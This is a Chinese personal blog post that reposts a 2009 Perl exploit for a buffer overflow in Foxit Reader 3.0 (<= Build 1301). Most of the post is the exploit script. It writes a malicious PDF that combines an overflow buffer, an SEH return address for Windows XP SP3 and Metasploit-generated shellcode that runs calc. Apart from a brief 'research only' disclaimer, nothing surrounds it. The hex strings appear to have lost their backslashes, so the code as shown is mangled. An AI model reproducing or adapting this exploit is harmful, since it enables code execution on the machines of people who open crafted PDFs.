夜火博客 个人的碎碎念收集箱

Foxit Reader 3.0 (<=Build 1301) PDF 缓冲区溢出漏洞利用工具Exploit

Foxit Reader 3.0 (<=Build 1301) PDF 缓冲区溢出漏洞利用工具Exploit,仅供研究,请勿用于非法用途

 

#!/usr/bin/perl
#
#
Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit
# ------------------------------------------------------------
# Exploit by SkD                          (skdrat@hotmail.com)
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# Exploit written for
Windows XP SP3.
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.


use strict;
use warnings;

my $pdf_data1 = "x25x50x44x46x2Dx31x2Ex34x0Dx0Ax25xA1xB3xC5xD7x0Dx0Ax31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70".
         "x65x2Fx50x61x67x65x2Fx50x61x72x65x6Ex74x20x34x20x30x20x52x20x2Fx52x65x73x6Fx75x72x63x65x73x20x36".
         "x20x30x20x52x20x2Fx4Dx65x64x69x61x42x6Fx78x5Bx20x30x20x30x20x35x39x35x20x38x34x32x5Dx2Fx47x72x6F".
         "x75x70x3Cx3Cx2Fx53x2Fx54x72x61x6Ex73x70x61x72x65x6Ex63x79x2Fx43x53x2Fx44x65x76x69x63x65x52x47x42".
         "x2Fx49x20x74x72x75x65x3Ex3Ex2Fx43x6Fx6Ex74x65x6Ex74x73x20x32x20x30x20x52x20x2Fx41x6Ex6Ex6Fx74x73".
         "x5Bx20x39x20x30x20x52x20x20x32x34x20x30x20x52x20x20x32x35x20x30x20x52x20x5Dx3Ex3Ex0Dx0Ax65x6Ex64".
         "x6Fx62x6Ax0Dx0Ax32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x33x20x30x20x52x20x2Fx46".
         "x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx33xD0x33".
         "x54x28xE7x2Ax54x30x50x30x00xB2x4Cx2Dx4DxF5x8Cx15x2Cx4Cx0CxF5x2Cx15x8Ax52x15xC2xB5x14xF2xB8x02x15".
         "x00x87xEBx07x8Ax0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax33x20x30x20x6Fx62".
         "x6Ax0Dx0Ax20x34x32x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65".
         "x2Fx50x61x67x65x73x2Fx52x65x73x6Fx75x72x63x65x73x20x36x20x30x20x52x20x2Fx4Dx65x64x69x61x42x6Fx78".
         "x5Bx20x30x20x30x20x35x39x35x20x38x34x32x5Dx2Fx4Bx69x64x73x5Bx20x31x20x30x20x52x20x5Dx2Fx43x6Fx75".
         "x6Ex74x20x31x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx5Ax69x54x69".
         "x20x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2F".
         "x46x6Fx6Ex74x20x35x20x30x20x52x20x2Fx50x72x6Fx63x53x65x74x5Bx2Fx50x44x46x2Fx54x65x78x74x5Dx3Ex3E".
         "x0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx43x61x74x61x6C".
         "x6Fx67x2Fx50x61x67x65x73x20x34x20x30x20x52x20x2Fx4Fx70x65x6Ex41x63x74x69x6Fx6Ex5Bx20x31x20x30x20".
         "x52x20x2Fx58x59x5Ax20x6Ex75x6Cx6Cx20x6Ex75x6Cx6Cx20x30x5Dx2Fx4Cx61x6Ex67x28x65x6Ex2Dx55x53x29x3E".
         "x3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx41x75x74x68x6Fx72x28xFExFF".
         "x00x6Dx00x61x00x72x00x63x00x69x00x61x00x6Ex00x6Fx29x2Fx43x72x65x61x74x6Fx72x28xFExFFx00x57x00x72".
         "x00x69x00x74x00x65x00x72x29x2Fx50x72x6Fx64x75x63x65x72x28xFExFFx00x4Fx00x70x00x65x00x6Ex00x4Fx00".
         "x66x00x66x00x69x00x63x00x65x00x2Ex00x6Fx00x72x00x67x00x20x00x33x00x2Ex00x30x29x2Fx43x72x65x61x74".
         "x69x6Fx6Ex44x61x74x65x28x44x3Ax32x30x30x39x30x32x31x39x31x34x34x35x34x39x2Dx30x32x27x30x30x27x29".
         "x2Fx4Dx6Fx64x44x61x74x65x28x44x3Ax32x30x30x39x30x32x31x39x31x34x34x38x31x35x2Dx30x32x27x30x30x27".
         "x29x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx46".
         "x69x6Cx65x73x70x65x63x2Fx46x28x63x75x61x6Cx71x75x69x65x72x61x29x2Fx46x53x2Fx55x52x4Cx3Ex3Ex0Dx0A".
         "x65x6Ex64x6Fx62x6Ax0Dx0Ax31x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx43x44x2Fx43x54x28x61x70".
         "x70x6Cx69x63x61x74x69x6Fx6Ex2Fx66x75x74x75x72x65x73x70x6Cx61x73x68x29x2Fx50x3Cx3Cx2Fx54x46x28x54".
         "x45x4Dx50x41x43x43x45x53x53x29x3Ex3Ex2Fx44x20x31x35x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6A".
         "x0Dx0Ax31x33x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x2Fx4Dx52x2Fx43x20x31x34x20x30x20x52x20x2Fx4Ex28".
         "x63x75x61x6Cx71x75x69x65x72x61x29x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x32x20x30x20x6Fx62x6Ax0D".
         "x0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6Fx6Ex2Fx53x2Fx52x65x6Ex64x69x74x69x6Fx6Ex2Fx4Fx50x20x34".
         "x2Fx41x4Ex20x39x20x30x20x52x20x2Fx52x20x31x33x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0A".
         "x31x31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx45x78x74x47x53x74x61x74x65x2Fx43x41x20x31".
         "x2Fx63x61x20x31x2Fx41x49x53x20x66x61x6Cx73x65x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31x30x20x30x20".
         "x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Dx61x74x72x69x78x5Bx20x31x20x30x20x30x20x31x20x30x20x30x5Dx2Fx42x42x6F".
         "x78x5Bx20x30x20x30x20x31x33x30x2Ex31x33x39x20x32x37x2Ex32x38x39x37x5Dx2Fx52x65x73x6Fx75x72x63x65".
         "x73x3Cx3Cx2Fx45x78x74x47x53x74x61x74x65x3Cx3Cx2Fx49x6Dx61x67x65x4Fx70x61x63x69x74x79x20x31x31x20".
         "x30x20x52x20x3Ex3Ex3Ex3Ex2Fx4Cx65x6Ex67x74x68x20x35x34x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44".
         "x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78x9Cx2BxE4x2AxE4x32x50x00xC1xA2x74x30xC3xD0xD8x40".
         "xCFxD0xD8x52xC1xC8x5CxCFxC8xC2xD2x5CxA1x28x95xCBx50x01x08x8Dx2Cx20xC2xA6x70xE1x34x2DxAEx40x20x04".
         "x00xBDx52x0Dx43x0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax39x20x30x20x6Fx62".
         "x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74x79x70x65x2Fx53x63x72x65x65x6Ex2F".
         "x50x20x31x20x30x20x52x20x2Fx4Dx28x44x3Ax32x30x30x39x30x32x31x39x31x34x34x37x35x36x2Dx30x32x27x30".
         "x30x27x29x2Fx46x20x34x2Fx52x65x63x74x5Bx20x32x30x35x2Ex31x35x33x20x38x30x36x2Ex31x38x32x20x33x33".
         "x35x2Ex32x39x31x20x38x33x33x2Ex34x37x32x5Dx2Fx42x53x3Cx3Cx2Fx53x2Fx53x2Fx57x20x31x3Ex3Ex2Fx42x45".
         "x3Cx3Cx2Fx53x2Fx53x3Ex3Ex2Fx4Dx4Bx3Cx3Cx2Fx42x43x5Bx20x30x20x30x20x31x5Dx2Fx52x20x30x2Fx49x46x3C".
         "x3Cx2Fx53x57x2Fx41x2Fx53x2Fx41x2Fx46x42x20x66x61x6Cx73x65x2Fx41x5Bx20x30x2Ex35x20x30x2Ex35x5Dx3E".
         "x3Ex3Ex3Ex2Fx41x50x3Cx3Cx2Fx4Ex20x31x30x20x30x20x52x20x3Ex3Ex2Fx54x28x63x75x61x6Cx71x75x69x65x72".
         "x61x29x2Fx41x20x31x32x20x30x20x52x20x2Fx41x41x20x31x37x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62".
         "x6Ax0Dx0Ax32x35x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x6Ex6Ex6Fx74x2Fx53x75x62x74x79".
         "x70x65x2Fx50x6Fx70x75x70x2Fx50x20x31x20x30x20x52x20x2Fx4Dx28x44x3Ax32x30x30x39x30x32x31x39x31x34".
         "x34x38x31x35x2Dx30x32x27x30x30x27x29x2Fx46x20x32x38x2Fx52x65x63x74x5Bx20x30x20x30x20x30x20x30x5D".
         "x2Fx4Fx70x65x6Ex20x66x61x6Cx73x65x2Fx50x61x72x65x6Ex74x20x32x34x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6E".
         "x64x6Fx62x6Ax0Dx0Ax32x34x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx53x75x62x74x79x70x65x2Fx46x72x65x65x54".
         "x65x78x74x2Fx52x65x63x74x5Bx20x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx46x20x34x2Fx41".
         "x50x20x31x39x20x30x20x52x20x2Fx46x6Fx78x69x74x54x61x67x20x32x33x20x30x20x52x20x2Fx50x20x31x20x30".
         "x20x52x20x2Fx50x6Fx70x75x70x20x32x35x20x30x20x52x20x2Fx46x4Ex28x48x65x6Cx76x65x74x69x63x61x29x2F".
         "x43x6Fx6Ex74x65x6Ex74x73x28x45x64x69x74x65x64x20x62x79x20x46x6Fx78x69x74x20x52x65x61x64x65x72x5C".
         "x72x43x6Fx70x79x72x69x67x68x74x5Cx28x43x5Cx29x20x62x79x20x46x6Fx78x69x74x20x53x6Fx66x74x77x61x72".
         "x65x20x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2Dx32x30x30x38x5Cx72x46x6Fx72x20x45x76x61x6Cx75x61x74".
         "x69x6Fx6Ex20x4Fx6Ex6Cx79x2Ex5Cx72x29x2Fx42x4Bx43x20x36x35x35x33x35x2Fx51x20x30x2Fx44x41x28x2Fx5A".
         "x69x54x69x20x31x31x20x54x66x20x31x20x30x20x30x20x72x67x20x31x20x30x20x30x20x31x20x32x38x35x20x38".
         "x31x30x2Ex35x20x54x6Dx20x30x20x54x63x20x31x30x30x20x54x7Ax29x2Fx49x54x2Fx46x72x65x65x54x65x78x74".
         "x54x79x70x65x77x72x69x74x65x72x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x33x20x30x20x6Fx62x6Ax0Dx0A".
         "x3Cx3Cx2Fx54x65x78x74x4Dx61x74x72x69x78x5Bx20x31x20x30x20x30x20x31x20x32x38x35x20x38x31x30x2Ex35".
         "x5Dx2Fx4Cx69x63x65x6Ex73x65x28x45x76x61x6Cx75x61x74x69x6Fx6Ex29x2Fx4Dx65x6Ex64x65x72x46x6Cx61x67".
         "x28x45x76x61x6Cx75x61x74x69x6Fx6Ex2Cx41x4Ex4Ex4Fx54x29x2Fx46x6Fx6Ex74x4Ex61x6Dx65x28x48x65x6Cx76".
         "x65x74x69x63x61x29x2Fx46x6Fx6Ex74x53x69x7Ax65x20x31x31x2Fx54x65x78x74x28x45x64x69x74x65x64x20x62".
         "x79x20x46x6Fx78x69x74x20x52x65x61x64x65x72x5Cx72x43x6Fx70x79x72x69x67x68x74x5Cx28x43x5Cx29x20x62".
         "x79x20x46x6Fx78x69x74x20x53x6Fx66x74x77x61x72x65x20x43x6Fx6Dx70x61x6Ex79x2Cx32x30x30x35x2Dx32x30".
         "x30x38x5Cx72x46x6Fx72x20x45x76x61x6Cx75x61x74x69x6Fx6Ex20x4Fx6Ex6Cx79x2Ex5Cx72x29x2Fx43x68x61x72".
         "x43x6Fx6Cx6Fx72x20x32x35x35x2Fx43x68x61x72x53x70x61x63x65x20x30x2Fx4Cx69x6Ex65x46x65x65x64x20x30".
         "x2Fx48x6Fx72x7Ax53x63x61x6Cx65x20x31x30x30x2Fx4Fx72x69x67x69x6Ex58x20x32x38x35x2Fx4Fx72x69x67x69".
         "x6Ex59x20x38x31x36x2Fx62x43x68x61x6Ex67x65x42x6Fx78x20x30x2Fx42x6Fx78x57x69x64x74x68x20x32x35x36".
         "x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x32x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Dx79x46x6Fx6Ex74x20".
         "x31x38x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x31x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2F".
         "x46x6Fx6Ex74x20x32x32x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax32x30x20x30x20x6Fx62x6A".
         "x0Dx0Ax3Cx3Cx2Fx4Cx65x6Ex67x74x68x20x31x36x38x2Fx53x75x62x74x79x70x65x2Fx46x6Fx72x6Dx2Fx42x42x6F".
         "x78x5Bx20x32x38x35x20x37x39x34x20x35x34x31x20x38x32x37x5Dx2Fx52x65x73x6Fx75x72x63x65x73x20x32x31".
         "x20x30x20x52x20x2Fx46x69x6Cx74x65x72x2Fx46x6Cx61x74x65x44x65x63x6Fx64x65x3Ex3Ex73x74x72x65x61x6D".
         "x0Dx0Ax78x9Cx95x8DxCDx0Ex82x30x10x84xEFx7Dx8Ax3Dx42xA2xD8x16x88x78x15xE1x66x4CxB4x2Fx50x43xC1x1A".
         "xE8x92xA6xFExF4xEDx25x24x28x89x27xF6x30x99x99x6CxBExD9x0BxB2x39xFAx12x8Dx03xC6x40xD4x84x45x74x3C".
         "xA0x7FxC6x36x84xC1x90x81x01xCFxD2xA9xDDxEEx92xC9x8Ax8Ex7Cx9Fx79x12xC5x9Cx51x3Ax40x0Fx24x28x2AxED".
         "x54x05x57x0Fx25xBExB5x83xB3x92x95xB2x21x88xFBx02x24x8BxE7xC8x1Cx7Bx6Fx75x73x73x41x1ExFExC0x17xAC".
         "xDDx4Bx5Ax05x39x76xBDx34x7ExC5x29x4DxD7x83x64x0BxC7xF8x7CxABx44x0BxC5x53xB6x0FxE9x34x1Ax38x99xD6".
         "x47x23xAFx10xE4x03x4Ax14x4Cx32x0Dx0Ax65x6Ex64x73x74x72x65x61x6Dx0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax31".
         "x39x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx4Ex20x32x30x20x30x20x52x20x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0D".
         "x0Ax31x38x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx46x6Fx6Ex74x2Fx53x75x62x74x79x70x65x2F".
         "x54x79x70x65x31x2Fx42x61x73x65x46x6Fx6Ex74x2Fx48x65x6Cx76x65x74x69x63x61x2Fx45x6Ex63x6Fx64x69x6E".
         "x67x2Fx57x69x6Ex41x6Ex73x69x45x6Ex63x6Fx64x69x6Ex67x2Fx46x78x54x61x67x20x31x3Ex3Ex0Dx0Ax65x6Ex64".
         "x6Fx62x6Ax0Dx0Ax31x37x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx50x56x20x31x36x20x30x20x52x20x3Ex3Ex0Dx0A".
         "x65x6Ex64x6Fx62x6Ax0Dx0Ax31x36x20x30x20x6Fx62x6Ax0Dx0Ax3Cx3Cx2Fx54x79x70x65x2Fx41x63x74x69x6Fx6E".
         "x2Fx53x2Fx4Cx61x75x6Ex63x68x2Fx46x3Cx3Cx2Fx46x28x2Fx43x2F";
my $pdf_data2 = "x29x3Ex3Ex2Fx4Ex65x77x57x69x6Ex64x6Fx77x20x74x72x75x65x3Ex3Ex0Dx0Ax65x6Ex64x6Fx62x6Ax0Dx0Ax78x72".
         "x65x66x0Dx0Ax30x20x32x36x0Dx0Ax30x30x30x30x30x30x30x30x30x30x20x36x35x35x33x36x20x66x0Dx0Ax30x30".
         "x30x30x30x30x30x30x31x37x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x31x39x37x20x30x30x30".
         "x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x33x31x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30".
         "x30x33x33x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x34x33x32x20x30x30x30x30x30x20x6E".
         "x0Dx0Ax30x30x30x30x30x30x30x34x36x38x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x35x32x32".
         "x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x36x31x39x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30".
         "x30x30x30x30x31x33x37x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x31x34x37x20x30x30x30".
         "x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x30x38x38x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30".
         "x31x30x31x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x39x36x32x20x30x30x30x30x30x20x6E".
         "x0Dx0Ax30x30x30x30x30x30x30x38x37x32x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x38x31x33".
         "x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x39x38x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30".
         "x30x30x30x30x32x39x34x39x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x38x34x39x20x30x30x30".
         "x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x38x31x35x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30".
         "x32x35x32x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x34x38x33x20x30x30x30x30x30x20x6E".
         "x0Dx0Ax30x30x30x30x30x30x32x34x34x34x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x32x31x30x32".
         "x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x37x36x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30".
         "x30x30x30x30x31x36x33x35x20x30x30x30x30x30x20x6Ex0Dx0Ax74x72x61x69x6Cx65x72x0Dx0Ax3Cx3Cx2Fx52x6F".
         "x6Fx74x20x37x20x30x20x52x20x2Fx49x6Ex66x6Fx20x38x20x30x20x52x20x2Fx49x44x5Bx28xDFxB0x2BxECxF3x6B".
         "xFAx01x9CxBCx4Bx06x11x7Cx78x79x29x28xDFxB0x2BxECxF3x6BxFAx01x9CxBCx4Bx06x11x7Cx78x79x29x5Dx2Fx44".
         "x6Fx63x43x68x65x63x6Bx73x75x6Dx2Fx37x36x33x36x30x32x39x46x42x32x42x32x46x44x32x39x42x43x33x34x41".
         "x42x43x33x32x43x46x34x35x42x38x46x2Fx53x69x7Ax65x20x32x36x3Ex3Ex0Dx0Ax73x74x61x72x74x78x72x65x66".
         "x0Dx0Ax38x30x35x37x0Dx0Ax25x25x45x4Fx46x0Dx0A";

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x30x42x50x4bx58x45x44x4ex43x4bx58x4ex37".
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx44x4ax41x4bx58".
"x4fx55x42x32x41x30x4bx4ex49x44x4bx38x46x53x4bx58".
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x48x42x4c".
"x46x37x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x32x46x50x45x37x45x4ex4bx48".
"x4fx35x46x32x41x30x4bx4ex48x36x4bx58x4ex30x4bx54".
"x4bx48x4fx55x4ex41x41x50x4bx4ex4bx48x4ex31x4bx38".
"x41x30x4bx4ex49x58x4ex45x46x32x46x50x43x4cx41x33".
"x42x4cx46x46x4bx58x42x44x42x33x45x38x42x4cx4ax47".
"x4ex30x4bx48x42x34x4ex50x4bx48x42x37x4ex51x4dx4a".
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx58x42x48x42x4b".
"x42x30x42x30x42x30x4bx38x4ax56x4ex43x4fx35x41x43".
"x48x4fx42x36x48x45x49x58x4ax4fx43x48x42x4cx4bx37".
"x42x55x4ax36x50x37x4ax4dx44x4ex43x47x4ax36x4ax59".
"x50x4fx4cx38x50x30x47x35x4fx4fx47x4ex43x46x41x36".
"x4ex56x43x36x42x50x5a";

my $overflow1 = "x41" x 1346;
my $overflow2 = "x41" x (4096 - (length($shellcode) + 255));
my $overflow3 = "x41" x 255;
my $sehjmp = "SkD"; # ;)
my $sehret = "x64xeex1fx02";     # 0x021fee64 - damn you SafeSEH

open (my $pdf, "> s.pdf");
binmode $pdf;
print $pdf $pdf_data1.
           $overflow1.$sehjmp.$sehret.$overflow2.$shellcode.$overflow3.
           $pdf_data2;
close $pdf;

# milw0rm.com [2009-03-11]

留言列表
发表评论
来宾的头像